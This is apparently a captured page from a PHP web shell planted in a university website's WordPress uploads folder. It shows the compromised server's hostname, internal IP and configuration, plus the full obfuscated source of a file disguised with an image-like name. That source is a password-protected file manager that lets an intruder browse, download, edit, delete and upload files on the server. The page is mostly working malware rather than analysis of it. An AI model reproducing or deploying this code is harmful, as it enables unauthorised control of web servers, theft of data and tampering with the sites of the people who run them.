403Webshell
Server IP : 172.24.0.40  /  Your IP : 216.73.216.10
Web Server : Apache
System : Linux dbweb26.ust.edu.ph 4.18.0-513.5.1.el8_9.x86_64 #1 SMP Fri Sep 29 05:21:10 EDT 2023 x86_64
User : apache ( 48)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/medicine.dbweb26.0617251441/public_html/wp-content/uploads/2024/07/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/medicine.dbweb26.0617251441/public_html/wp-content/uploads/2024/07/frms1-800x600.php
<?php
 goto NnH03; EBXAX: if (D("\144\157\x77\x6e\154\157\141\144")) { @readfile(M(D("\x64\157\167\x6e\x6c\x6f\141\x64"))); die; } goto Scm04; rvkON: function R($p, $n) { if (!is_file($p . "\x2f" . $n)) { file_put_contents($p . "\57" . $n, ''); return 1; } return 0; } goto SIgJl; Tu42z: $h = "\x3c\x68\145\x61\x64\76\74\155\145\164\x61\x20\x6e\x61\x6d\145\x3d\42\166\x69\x65\x77\x70\157\162\x74\x22\40\143\157\156\164\x65\x6e\x74\x3d\42\167\151\144\x74\150\x3d\x64\145\x76\x69\x63\145\x2d\167\x69\x64\x74\x68\54\x20\x69\156\x69\x74\151\x61\x6c\x2d\163\143\x61\x6c\145\x3d\61\56\x30\42\57\76\x3c\x74\151\164\x6c\145\76\x4d\x69\x6e\151\55\106\151\154\x65\115\x61\156\x61\147\x65\x72\x3c\x2f\164\x69\x74\x6c\145\x3e\x3c\163\164\x79\154\145\76\160\162\x65\x7b\x62\157\x72\144\x65\162\x3a\61\160\x78\40\163\157\154\151\x64\x20\43\x64\144\x64\73\160\141\144\x64\x69\x6e\x67\x3a\x35\x70\170\x3b\x6f\166\x65\x72\146\154\x6f\x77\x3a\141\165\164\157\175\164\141\142\x6c\x65\173\142\x6f\162\144\x65\x72\55\x63\x6f\x6c\154\141\160\x73\x65\x3a\143\157\x6c\154\141\x70\163\x65\x3b\x77\x69\144\164\150\x3a\x31\60\60\45\x3b\x6f\166\x65\x72\x66\154\x6f\x77\x3a\141\165\x74\x6f\175\x74\x68\54\164\144\x7b\x70\x61\144\x64\x69\156\147\x3a\x30\56\x32\x35\x72\145\155\x3b\164\145\170\x74\55\141\x6c\151\147\156\72\154\x65\x66\164\73\x62\x6f\x72\x64\145\162\55\142\157\x74\x74\157\x6d\72\61\160\x78\x20\x73\x6f\x6c\151\144\40\43\x63\x63\143\175\x74\142\157\144\171\40\x74\162\x3a\156\164\150\x2d\x63\150\x69\x6c\x64\50\157\x64\144\51\173\x62\141\x63\153\147\162\x6f\165\x6e\144\72\43\145\145\145\x7d\x74\x72\x3a\x68\157\166\x65\162\173\x62\x61\143\x6b\x67\162\157\165\156\144\x2d\x63\157\x6c\x6f\162\72\x23\x66\65\x66\x35\146\65\175\74\57\163\x74\x79\154\145\x3e\74\x2f\150\145\x61\144\x3e"; goto yrigV; NnH03: error_reporting(0); goto Mh0zP; VO5bf: function E($t, $n, $v = '', $s = '') { if (in_array($t, array("\x74\x65\x78\164", "\x70\141\163\163\x77\157\x72\x64", "\163\x75\x62\x6d\x69\164", "\146\151\x6c\145"))) { return "\74\151\x6e\x70\165\x74\40\164\171\x70\145\x3d\x27{$t}\47\x20\x6e\x61\x6d\145\x3d\x27{$n}\x27\40\166\x61\154\x75\145\x3d\x27{$v}\x27\x20\x73\x74\171\x6c\x65\x3d\x27{$s}\x27\57\x3e"; } return "\x3c{$t}\x20\156\x61\155\x65\75\x27{$n}\x27\40\163\164\x79\x6c\145\75\47{$s}\x27\76{$v}\x3c\57{$t}\76"; } goto kl5P3; akTfb: function T($p, $f) { $n = basename($f["\x6e\x61\155\145"]); if (!is_file($p . "\57" . $n)) { if (move_uploaded_file($f["\164\x6d\x70\x5f\x6e\x61\x6d\145"], $p . "\x2f" . $n)) { return 1; } } return 0; } goto TPOFh; pbGr3: function N($d) { if (is_file($d)) { return unlink($d); } if (is_dir($d)) { return rmdir($d); } return 0; } goto fnlDY; wICfL: if (C("\165\160\154\x6f\x61\144")) { T(J(), $_FILES["\146\151\x6c\x65"]) ? die("\165\160\x6c\x6f\141\144\72\x20" . $_FILES["\x66\x69\154\145"]["\x6e\141\155\145"]) : die("\x55\160\154\157\x61\144\40\105\x72\x72\157\162"); } goto dwsgQ; I9wh1: function V() { exec("\167\155\151\143\x20\x6c\x6f\147\x69\x63\141\154\144\151\x73\x6b\40\x67\x65\164\40\143\141\x70\x74\151\x6f\156", $c); $r = ''; foreach ($c as $d) { $r .= $d != "\x43\141\160\164\x69\157\x6e" ? H("\77\x70\141\x74\x68\x3d{$d}", $d) : ''; } return $r; } goto Vwylc; Mh0zP: session_start(); goto I0jDw; LemD1: if (C("\156\x65\167\x64\x69\x72")) { S(J(), C("\144\x69\162\x6e\x61\155\145")) ? die("\103\x72\x65\x61\x74\145\x3a\x20" . C("\x64\x69\162\x6e\141\x6d\x65")) : die("\104\151\x72\40\x65\170\x69\x74\145\x73"); } goto wICfL; fnlDY: function O($e) { if (is_file($e)) { return F("\120\117\123\x54", array("\164\x65\x78\x74\141\162\145\141" => array("\x65\x64\151\x74", htmlentities(file_get_contents($e)), "\x77\151\144\x74\x68\72\x31\60\60\45\x3b\150\145\x69\147\150\x74\x3a\71\60\x25"), "\x73\x75\142\155\151\x74" => array("\163\x61\x76\145", "\123\141\166\x65"))); } return 0; } goto FuY0l; KwwYL: function Q($p) { if (is_file($p)) { return htmlentities(file_get_contents($p)); } return 0; } goto rvkON; Dm8JT: function D($n) { return isset($_GET[$n]) ? $_GET[$n] : 0; } goto VO5bf; kl5P3: function F($m, $i, $x = '') { $f = "\x3c\146\x6f\162\x6d\40\x6d\145\x74\150\157\x64\x3d{$m}\x20\x65\156\x63\164\171\160\x65\75\x27{$x}\47\76"; foreach ($i as $k => $v) { $f .= E($k, is_array($v) ? $v[0] : $v, isset($v[1]) ? $v[1] : '', isset($v[2]) ? $v[2] : ''); } return $f . "\74\57\146\x6f\x72\155\76"; } goto T8dzq; T8dzq: function G($t, $b) { $h = ''; foreach ($t as $x) { $h .= "\x3c\x74\150\76{$x}\x3c\x2f\164\150\76"; } $d = ''; foreach ($b as $r) { $d .= "\74\164\x72\x3e"; foreach ($r as $z) { $d .= "\x3c\164\x64\76{$z}\x3c\x2f\x74\144\x3e"; } $d .= "\x3c\x2f\164\162\x3e"; } return "\x3c\164\141\142\154\145\76\x3c\164\x68\x65\x61\x64\x3e{$h}\74\57\x74\150\145\141\x64\76\74\x74\x62\x6f\x64\x79\76{$d}\x3c\x2f\164\x62\x6f\144\171\76\x3c\x2f\164\141\142\154\x65\76"; } goto VSeWB; fPJ7S: function B($n, $v) { $_SESSION[$n] = $v; } goto No10o; h_Wgl: function L($p) { return date("\115\40\x64\x20\x59\x20\110\x3a\x69\72\x73", filemtime($p)); } goto tu2Qn; Zqyco: $l = F("\x50\x4f\x53\x54", array("\x70" => array('', "\120\x61\163\x73\x77\157\x72\x64\x28\x64\x65\x66\141\165\x6c\164\40\141\x64\155\151\156\x29\x3a\x20"), "\160\141\163\x73\x77\x6f\x72\144" => array("\160\x61\x73\163", ''), "\x73\x75\x62\x6d\151\164" => array("\x6c\x6f\147\x69\156", "\114\x6f\147\x69\x6e"))); goto N1Xf2; Scm04: if (C("\x6e\145\x77\146\x69\x6c\145")) { R(J(), C("\146\x69\154\x65\156\141\x6d\x65")) ? die("\103\162\x65\141\164\x65\72\x20" . C("\146\151\x6c\145\x6e\x61\x6d\x65")) : die("\x46\151\x6c\145\x20\145\x78\x69\164\145\163"); } goto LemD1; tu2Qn: function M($d) { if (!is_file($d)) { return 0; } header("\103\157\x6e\x74\x65\156\164\x2d\124\171\x70\x65\72\40\141\160\x70\x6c\x69\x63\141\164\151\x6f\x6e\57\157\143\164\x65\x74\x2d\163\164\162\145\x61\x6d"); header("\103\x6f\156\x74\145\x6e\x74\x2d\x54\162\x61\x6e\163\x66\145\x72\x2d\105\156\x63\x6f\x64\151\156\x67\x3a\x20\x42\151\x6e\141\x72\171"); header("\103\x6f\156\x74\x65\156\x74\55\144\x69\163\x70\x6f\163\151\164\151\157\156\x3a\x20\x61\x74\164\141\143\150\155\x65\156\164\73\40\146\151\x6c\145\x6e\x61\155\145\x3d\42" . basename($d) . "\x22"); return readfile($d); } goto pbGr3; yrigV: function A($n) { return isset($_SESSION[$n]) ? $_SESSION[$n] : 0; } goto fPJ7S; N1Xf2: if (!I()) { die($l); } goto jJtWa; WZHxb: function I() { if (A("\154\157\x67\x69\156")) { return 1; } if (!C("\154\157\x67\x69\x6e")) { return 0; } if (C("\x70\x61\163\163") != password) { return 0; } B("\154\x6f\147\151\x6e", 1); return 1; } goto fnDEE; VSeWB: function H($l, $x, $t = '') { return "\x3c\141\40\x68\162\145\x66\x3d\x27{$l}\x27\x20\164\x61\x72\147\145\164\75\x27{$t}\x27\76{$x}\74\x2f\x61\x3e\x20"; } goto WZHxb; SIgJl: function S($p, $n) { if (!is_dir($p . "\57" . $n)) { mkdir($p . "\57" . $n); return 1; } return 0; } goto akTfb; Vwylc: function W() { $x = J(); if (!is_dir($x)) { return 0; } $z = scandir($x); $k = array(); $i = 0; foreach ($z as $d) { if ($d == "\56" || $d == "\x2e\56") { continue; } $p = $x . "\57" . $d; $s = "\55\55"; $j = "\x26\43\x31\x32\70\61\71\63\73"; $t = L($p); $l = H("\x3f\160\141\x74\x68\75{$p}", $d); $v = substr(sprintf("\45\157", fileperms($p)), -4); $o = function_exists("\160\x6f\163\151\170\x5f\x67\x65\164\160\x77\x75\x69\x64") ? posix_getpwuid(fileowner($p))["\x6e\x61\155\x65"] : fileowner($p); $c = (is_file($p) ? H("\77\145\144\151\164\x3d{$p}", "\x45\144\x69\x74", "\137\x62\154\141\x6e\x6b") : '') . H("\77\x64\x65\154\145\164\x65\75{$p}", "\104\x65\x6c\145\x74\x65", "\x5f\x62\154\x61\x6e\153") . (is_file($p) ? H("\x3f\144\x6f\x77\156\x6c\x6f\141\144\75{$p}", "\x44\x6f\167\x6e\x6c\x6f\141\144", "\137\x62\154\141\156\x6b") : ''); if (is_file($p)) { $s = K(filesize($p)); $j = "\x26\x23\61\62\70\x32\x32\61\x3b"; } $k[] = array($j, $i, $l, $s, $t, $v, $o, $c); $i++; } return G(array("\43", "\x69\x64", "\106\151\154\145\156\x61\155\145", "\123\x69\172\145", "\115\157\x64\x69\146\x69\145\x64", "\x50\x65\x72\x6d\x73", "\117\x77\156\145\162", ''), $k); } goto Zqyco; jJtWa: if (D("\144\145\154\x65\x74\145")) { N(D("\144\145\154\145\x74\x65")) ? die("\104\x65\154\x65\x74\x65\144\x3a\x20" . D("\x64\x65\154\145\x74\x65")) : die("\x46\x69\154\145\x20\x6e\x6f\164\x20\x66\157\x75\156\144"); } goto GDw2k; No10o: function C($n) { return isset($_POST[$n]) ? $_POST[$n] : 0; } goto Dm8JT; I0jDw: define("\x70\x61\x73\x73\167\x6f\x72\144", "\x6c\x75\143\x6b\x73\x68\x75\x79\x69"); goto Tu42z; fnDEE: function J() { $p = __DIR__; if (D("\x70\x61\x74\x68")) { $p = D("\x70\141\164\150"); } return $p; } goto e0pQM; TPOFh: function U($p) { if ($p == '' || $p == "\x2f") { return $p; } $p = explode("\x2f", str_replace("\134", "\57", $p)); array_pop($p); return implode("\x2f", $p); } goto I9wh1; FuY0l: function P($p, $s) { if (is_file($p)) { file_put_contents($p, html_entity_decode($s)); return 1; } return 0; } goto KwwYL; e0pQM: function K($b) { $l = array("\x42", "\x4b\x42", "\x4d\x42", "\107\102", "\124\x42", "\x50\102"); for ($i = 0; $b >= 1024 && $i < count($l) - 1; $b /= 1024, $i++) { } return round($b, 2) . "\40" . $l[$i]; } goto h_Wgl; GDw2k: if (D("\145\144\151\x74")) { if (C("\163\141\166\x65")) { P(D("\x65\x64\x69\x74"), C("\145\x64\x69\x74")); echo "\x53\x61\x76\x65\144"; } $e = O(D("\x65\x64\x69\x74")); $e ? die($e) : die("\x46\151\x6c\145\x20\x6e\x6f\x74\40\146\x6f\165\x6e\x64"); } goto EBXAX; dwsgQ: echo $h . "\74\x62\157\x64\x79\76" . F("\x50\x4f\x53\x54", array("\164\x65\170\164" => array("\x66\151\x6c\145\x6e\141\155\x65", "\x46\x69\x6c\145\40\116\x61\155\145"), "\163\165\142\155\151\164" => array("\x6e\x65\167\146\151\154\145", "\103\162\x65\141\x74\x65"))) . F("\x50\117\x53\124", array("\x74\x65\170\x74" => array("\144\151\x72\156\141\155\145", "\104\x69\162\x20\116\x61\155\x65"), "\163\x75\142\155\x69\164" => array("\x6e\x65\x77\144\x69\x72", "\x43\162\x65\141\x74\x65"))) . F("\x50\117\x53\124", array("\146\x69\154\x65" => "\146\151\x6c\145", "\163\x75\142\155\x69\164" => array("\x75\160\x6c\x6f\141\144", "\x55\x70\x6c\157\141\x64")), "\155\x75\154\x74\x69\x70\x61\x72\164\57\146\x6f\x72\155\55\x64\141\164\x61") . H("\x3f\x70\x61\164\x68\x3d" . U(J()), "\x5b\x42\141\x63\153\x5d") . (PHP_OS_FAMILY == "\x57\x69\156\x64\157\x77\x73" ? V() : '') . (is_dir(J()) ? W() : "\x3c\160\x72\x65\76" . Q(J()) . "\x3c\x2f\160\162\x65\x3e") . "\74\57\x62\x6f\x64\171\76";

Youez - 2016 - github.com/yon3zu
LinuXploit